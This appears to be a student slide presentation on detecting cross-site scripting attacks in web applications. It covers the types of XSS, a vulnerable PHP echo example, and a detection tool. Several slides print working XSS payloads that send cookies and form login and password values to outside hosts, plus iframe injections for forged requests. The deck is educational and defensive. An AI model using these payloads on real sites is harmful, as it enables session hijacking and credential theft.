Date post: | 08-May-2015 |
Category: |
Technology |
Upload: | arjun-jain |
View: | 7,007 times |
Download: | 0 times |
Cross Side Scripting (XSS) attack
detection for web application http://sourceforge.net/projects/xssalert7/
Author: Arjun Jain (07104701) Department of Computer Science and Information Technology
Jaypee Institute of Information Technology Sector-62 Noida ,Uttar Pradesh
Agenda Overview of XSS attack
Type of XSS attack
Example
Limitation of attack
DOM security overview
XSS alert working model
Demo
What is Cross Side Scripting (XSS)
Cross-site scripting (XSS) is a type of computer security vulnerability typically found
in web applications that enables malicious attackers to inject client side script into
web pages viewed by other.
Types:
1: Reflected XSS
2: Stored XSS
3: DOM based XSS
Ranked #1 in OWASP 2007 top 10
Ranked #2 in OWASP 2010 top 10
7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security
statistics report, Oct 2007 )
Reflected XSS It detect all non-persistent XSS issues which occur when a web application blindly
echo parts of the HTTP request in the corresponding HTTP response HTML.
Example :
<?php
$name= request.getParameter(“name”);
echo “Hey”.$name;
?>
$name may contain javascript.
Stored XSS
It refers to all XSS vulnerabilities, where the adversary is able to permanently inject
the malicious script in the vulnerable application storage . The result is every user
that accesses the poisoned web page received the injected script without further
action by the adversary.
DOM-based XSS
It is special variant of the reflected XSS, where logic errors in legitimate JavaScript
and careless usage of the client-side data result in XSS coordination.
Example
Invalidated input with XSS
Invalidated input with XSS
Invalidated input in XSS
Invalidated input in XSS
Invalidated Input and resulted in a Cross-Site Scripting attack and the theft of the administrator’s Cookies.
Types of Information leakage
Client can reveal cookies to 3rd party (session state, order info, etc)
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-
bin/cookie.cgi?'%20+document.cookie</script >
Client can reveal posted form items to 3rd party (userID/passwd, etc)
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;
hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+
document.forms(1).password.value;" </form>
Client can be tricked into accessing/posting spoofed info to trusted server
www.trustedserver.com/xss.asp?name =
<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>
Client can be tricked into attacking other sites
/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>
Limitation of these attacks
Usually only get one transaction with XSS code against vulnerable site
Most attacks are only focused on collecting cookies
POST based forms are seldom leveraged – almost always use GET methods
Attacker does not know actual responses to client
Some experts recommend using POST, hidden form inputs and other session
state info to limit XSS risks.
DOM Security Overview Child windows and same site trust
Scripts can interact between the two windows
Script content can be loaded from anywhere (RPC/Remote scripting is common)
Images can be loaded from anywhere
Javascript can either be within <script></script> tags, loaded elsewhere via
<script src=remote.com>, or attacked to many tags
<img src=javascriptn load=javascript>
Form GET/POST can be to another site or a javascript action
XSS allows DOM abuse, but still follows DOM rules
XSS alert working model
Demo
Attack on Yahoo server with get string
“?q=”
Final Result
Thank You !